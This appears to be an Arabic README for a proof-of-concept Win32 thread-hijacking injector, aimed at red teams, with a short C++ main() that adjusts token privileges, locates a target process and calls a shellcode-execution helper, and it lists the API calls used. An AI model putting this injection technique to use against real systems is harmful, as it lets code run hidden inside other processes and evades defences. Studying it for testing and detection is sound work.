
PoC Thread Execution Hijacking لـ Win32 Code Injection
يستخدم هذا البرنامج تقنية اختطاف الخيوط (Thread Hijacking) لحقن شيل كود أصلي داخل تطبيق Win32 قياسي. كنت في الخامسة عشرة من عمري عندما صنعت هذا - من فضلك تجاهل الكود غير الاحترافي.
طورت هذا المشروع الصغير لمواصلة تجاربي حول طرق حقن الكود المختلفة، وللسماح لمحترفي أمن الفريق الأحمر (RedTeam) باستخدام هذه الطريقة كوسيلة فريدة لاختبار الاختراق البرمجي. باستخدام اختطاف الخيوط، يسمح برنامج hijacker.exe بتعليق خيط داخل برنامج target.exe مما يسمح لنا بكتابة شيل كود إلى ذلك الخيط الهدف، ثم تنفيذه لاحقًا (عبر: WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).

int main()
{
System sys;
Interceptor incp;
Exception exp;
sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}
if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}
system("PAUSE");
return 0;
}
https://capec.mitre.org/data/definitions/30.html